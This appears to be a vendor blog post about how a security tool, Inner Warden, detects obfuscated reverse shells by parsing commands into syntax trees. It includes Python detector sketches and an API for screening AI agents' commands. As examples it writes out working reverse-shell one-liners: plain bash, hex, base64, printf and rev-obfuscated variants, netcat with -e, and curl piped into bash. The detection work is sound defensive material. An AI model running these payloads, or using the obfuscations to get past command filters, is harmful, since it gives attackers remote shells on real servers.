Threat Detection

How Inner Warden Catches Obfuscated Reverse Shells (Tree-Sitter AST, Not Regex)

A reverse shell is often the first thing an attacker establishes after gaining initial access. It connects your server back to the attacker's machine and gives them an interactive terminal. The problem: modern payloads are heavily obfuscated. They use hex encoding, base64 wrapping, printf substitution, and variable indirection to slip past regex-based detection tools.

Inner Warden does not use regex for command analysis. It parses commands into an Abstract Syntax Tree (AST) using tree-sitter and analyzes the structure, not the text. This catches obfuscated payloads that text-only pattern matching misses.

Why regex fails for reverse shell detection

A naive reverse shell looks like this:

Plain reverse shell
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

A regex can catch that. But attackers rarely send it in that form. They send variants like these:

Hex-encoded payload
echo -e '\x62\x61\x73\x68\x20\x2d\x69' | bash
Base64-wrapped payload
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash
Printf substitution
bash -c "$(printf '\x62\x61\x73\x68 -i >& /\x64\x65\x76/\x74\x63\x70/10.0.0.1/4444 0>&1')"
Reversed string
echo '1&>0 4444/1.0.0.01/pct/ved/ &> i- hsab' | rev | bash

In the encoded variants, neither /dev/tcp nor bash -i appears in the raw command, so a regex written for those strings has nothing to match against. Regex rules of the kind used with fail2ban, OSSEC, and most SIEMs are blind to these payloads.
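To make the gap concrete, here is a minimal Python sketch. The SIGNATURE regex is an illustrative example of a text signature, not a rule taken from Inner Warden or any specific tool, and the helper names are hypothetical. It shows the same payload being flagged in plain form and missed once it is base64-wrapped.

```python
import base64
import re

# Illustrative text signature for Bash reverse shells (an assumption, not a real product rule).
SIGNATURE = re.compile(r"/dev/tcp/|bash\s+-i")

PLAIN = "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
WRAPPED = "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash"


def regex_flags(command: str) -> bool:
    """Return True if the raw command text matches the signature."""
    return SIGNATURE.search(command) is not None


def decoded_payload(command: str) -> str:
    """Decode the base64 blob, assumed to be the second whitespace-separated token."""
    blob = command.split()[1]
    return base64.b64decode(blob).decode("ascii")


if __name__ == "__main__":
    print(regex_flags(PLAIN))              # signature sees the plain payload
    print(regex_flags(WRAPPED))            # but not the wrapped one
    print(decoded_payload(WRAPPED) == PLAIN)
```

The wrapped command only reveals the signature after decoding, which is exactly the step the shell performs at run time and a text matcher does not.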

How tree-sitter AST analysis works

Instead of matching text, Inner Warden parses the command into a syntax tree using tree-sitter. The tree represents the structure of the command: pipes, redirections, subshells, command substitutions, and string operations. The analysis walks the tree looking for structural patterns, not string patterns.

For the hex-encoded example above, the AST reveals:

Node type: pipeline
Left side: echo with hex escape sequences (\x62\x61...)
Right side: bash (shell interpreter)
Pattern match: Encoded data piped into interpreter = reverse shell

The key insight: regardless of how the payload is encoded, the AST exposes the same structural shape, with encoded or obfuscated data flowing into a shell interpreter, usually through a pipeline, a command substitution, or eval. Tree-sitter sees the structure. Regex sees the text.
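The structural idea can be sketched in a few lines of Python. This is not Inner Warden's implementation: it swaps tree-sitter for the standard-library shlex tokenizer, so it only understands flat pipelines, and the names split_pipeline, looks_encoded, flags_encoded_pipe, INTERPRETERS, and DECODERS are hypothetical. It assumes Python 3.9 or later.

```python
import shlex
from posixpath import basename

# Hypothetical sets for illustration; the real lists are not given in this article.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "ksh"}
DECODERS = {"base64", "rev", "xxd"}


def split_pipeline(command: str) -> list[list[str]]:
    """Split a command into pipeline stages, each a list of word tokens."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True  # keep words such as base64 blobs in one token
    stages, current = [], []
    for token in lex:
        if token == "|":
            stages.append(current)
            current = []
        else:
            current.append(token)
    stages.append(current)
    return stages


def looks_encoded(stage: list[str]) -> bool:
    """True if the stage runs a decoder or carries hex escapes in its arguments."""
    if basename(stage[0]) in DECODERS:
        return True
    return any("\\x" in arg for arg in stage[1:])


def flags_encoded_pipe(command: str) -> bool:
    """Flag pipelines where encoded data flows into a shell interpreter."""
    stages = [s for s in split_pipeline(command) if s]
    if len(stages) < 2 or basename(stages[-1][0]) not in INTERPRETERS:
        return False
    return any(looks_encoded(stage) for stage in stages[:-1])
```

The check never looks for /dev/tcp or bash -i. It asks only what kind of stage feeds the interpreter, so the hex, base64, and rev variants all trip the same rule, while echo hello | bash does not. A real parser is still needed for command substitutions, eval, and ANSI-C quoting, which a flat tokenizer cannot represent.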

Patterns Inner Warden detects

The check-command analysis engine covers these reverse shell families and obfuscation techniques:

Pattern             Example                           AST signal
Python socket       python -c 'import socket...'      socket.socket + connect + subprocess
Perl socket         perl -e 'use Socket...'           use Socket + open + exec
mkfifo pipe         mkfifo /tmp/f; cat /tmp/f | bash  mkfifo + pipe into interpreter
Bash hex escapes    $'\x62\x61\x73\x68'               ANSI-C quoting with hex sequences
eval + base64       eval $(echo ... | base64 -d)      eval wrapping decoded substitution
printf build        $(printf '\x2f\x64\x65\x76...')   printf with hex in command substitution
rev pipe            echo '...' | rev | bash           string reversal piped into interpreter
Download + execute  curl http://x.x/s | bash          network fetch piped into interpreter
Netcat variants     nc -e /bin/sh 10.0.0.1 4444       nc/ncat with -e flag + interpreter path
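Two of the rows above, download + execute and netcat with -e, can be expressed as small structural rules. The sketch below is an assumption-laden illustration in Python: it uses the standard-library shlex tokenizer rather than tree-sitter, and the function names, category labels, and command sets are hypothetical rather than taken from Inner Warden.

```python
import shlex
from posixpath import basename

# Hypothetical command sets for illustration only.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "ksh"}
FETCHERS = {"curl", "wget"}
NETCAT = {"nc", "ncat", "netcat"}


def pipeline_stages(command: str) -> list[list[str]]:
    """Tokenize a command and split it into non-empty pipeline stages."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    stages, current = [], []
    for token in lex:
        if token == "|":
            stages.append(current)
            current = []
        else:
            current.append(token)
    stages.append(current)
    return [s for s in stages if s]


def classify(command: str) -> list[str]:
    """Return hypothetical category labels for the structural patterns found."""
    stages = pipeline_stages(command)
    names = [basename(stage[0]) for stage in stages]
    findings = []
    # Netcat variants: nc/ncat with -e and an interpreter path among the arguments.
    for stage, name in zip(stages, names):
        has_shell_arg = any(basename(arg) in INTERPRETERS for arg in stage[1:])
        if name in NETCAT and "-e" in stage and has_shell_arg:
            findings.append("netcat_exec")
    # Download + execute: a network fetch somewhere upstream of an interpreter.
    if len(stages) >= 2 and names[-1] in INTERPRETERS:
        if any(name in FETCHERS for name in names[:-1]):
            findings.append("download_execute")
    return findings
```

Each rule keys on the role a command plays (fetcher, interpreter, netcat with an exec flag), not on a literal payload string, which is why renaming the URL or the port does not change the verdict.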

The check-command API

Inner Warden exposes a POST /api/agent/check-command endpoint that analyzes any command without executing it. This is designed for AI agents (OpenClaw, n8n, custom automation) that need to validate commands before running them.

Check an obfuscated reverse shell
curl -s http://localhost:9111/api/agent/check-command \
  -H "Content-Type: application/json" \
  -d '{"command": "echo YmFzaCAtaSA+Ji... | base64 -d | bash"}'
Response
{
  "safe": false,
  "risk": "critical",
  "reasons": [
    "base64 decode piped into shell interpreter (reverse shell pattern)",
    "encoded payload obscures true intent"
  ],
  "categories": ["reverse_shell", "obfuscation"]
}

A clean command returns "safe": true with no reasons. The analysis runs in under 5ms because parsing and matching run as compiled native code (tree-sitter called from Rust). No network calls, no AI inference.
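For an agent written in Python, a thin client might look like the sketch below. The URL and the request and response fields come from the example above; the function names, the timeout value, and the fail-closed policy (treat anything other than "safe": true as a refusal) are assumptions, not documented Inner Warden behavior.

```python
import json
import urllib.request

# Endpoint from the curl example above; adjust host and port for your install.
CHECK_URL = "http://localhost:9111/api/agent/check-command"


def build_request(command: str, url: str = CHECK_URL) -> urllib.request.Request:
    """Build the POST request carrying the command as a JSON body."""
    body = json.dumps({"command": command}).encode("utf-8")
    return urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def check_command(command: str, url: str = CHECK_URL, timeout: float = 2.0) -> dict:
    """Send the command for analysis and return the parsed JSON verdict."""
    with urllib.request.urlopen(build_request(command, url), timeout=timeout) as resp:
        return json.load(resp)


def is_allowed(verdict: dict) -> bool:
    """Fail closed: only an explicit "safe": true lets the command run."""
    return verdict.get("safe") is True
```

An agent would call check_command before executing anything and skip the command when is_allowed returns False, logging the "reasons" list for review.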

Comparison with regex-based tools

Tools like fail2ban, OSSEC, and most SIEM rules rely on regex patterns to detect malicious commands. This works for known, unobfuscated payloads. It breaks down once the payload is encoded or rearranged.

Capability               Regex tools  Inner Warden (AST)
Plain reverse shells     Detected     Detected
Base64-encoded payloads  Missed       Detected
Hex-escaped strings      Missed       Detected
printf/rev obfuscation   Missed       Detected
Variable indirection     Missed       Detected
Pre-execution analysis   No           Yes (API)
Latency                  ~1ms         <5ms

Set it up

The check-command endpoint is available on the agent dashboard. Install Inner Warden and the API is ready:

Install
curl -fsSL https://innerwarden.com/install | sudo bash

The exec_audit collector watches for suspicious commands in real time. The check-command API lets external tools validate commands before execution. Both use the same tree-sitter engine.

What to do next

  • Protect AI agents on your server - use the check-command API to validate every command your AI agent wants to run.
  • SSH honeypot setup - capture the reverse shell payloads attackers try to run on your server.
  • View on GitHub - the check-command engine is open source. Read the implementation, report false positives, contribute patterns.